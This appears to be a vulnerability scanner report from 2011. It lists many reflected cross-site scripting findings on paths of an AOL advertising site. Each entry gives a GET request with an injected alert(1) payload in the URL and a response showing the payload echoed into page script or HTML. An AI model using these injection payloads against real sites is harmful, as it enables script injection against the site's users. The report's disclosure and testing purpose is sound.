Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/1/1/819977518/ |
GET /7bbcc"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:10 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:10 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/7bbcc"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/1/1/819977518/ |
GET /b471f"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:06 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/1/3/1696897902/ |
GET /35087"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:33 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/1/3/1696897902/ |
GET /caa83"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:36 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:36 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/caa83"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/2/2/1032347115/ |
GET /bd412"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:02 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:02 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/2/2/1032347115/ |
GET /28ac5"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:05 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:05 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/28ac5"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/2/3/1397978719/ |
GET /e5869"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:18 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/e5869"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/2/3/1397978719/ |
GET /f3f59"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:12 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/3/1/8239370/ |
GET /8c676"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13392 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/8c676"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/3/1/8239370/ |
GET /c8003"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:48 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:48 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13462 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/3/3/1557169105/ |
GET /4c13a"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/4c13a"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/3/3/1557169105/ |
GET /f6be9"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:49 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:49 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/4/1/1128450710/ |
GET /b3710"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:22 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/4/1/1128450710/ |
GET /12f6f"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:25 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:25 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/12f6f"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/4/3/708534695/ |
GET /7aa06"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:33 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/7aa06"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/4/3/708534695/ |
GET /69bea"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:29 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:29 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/5/2/1348442932/ |
GET /27601"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:16 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:16 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/5/2/1348442932/ |
GET /27551"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:19 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:19 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/27551"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/5/3/1649521156/ |
GET /96a23"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:25 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:25 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/96a23"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/5/3/1649521156/ |
GET /feaf1"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:22 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/6/1/1581270199/ |
GET /9154d"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:46 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/9154d"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/6/1/1581270199/ |
GET /f20a6"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
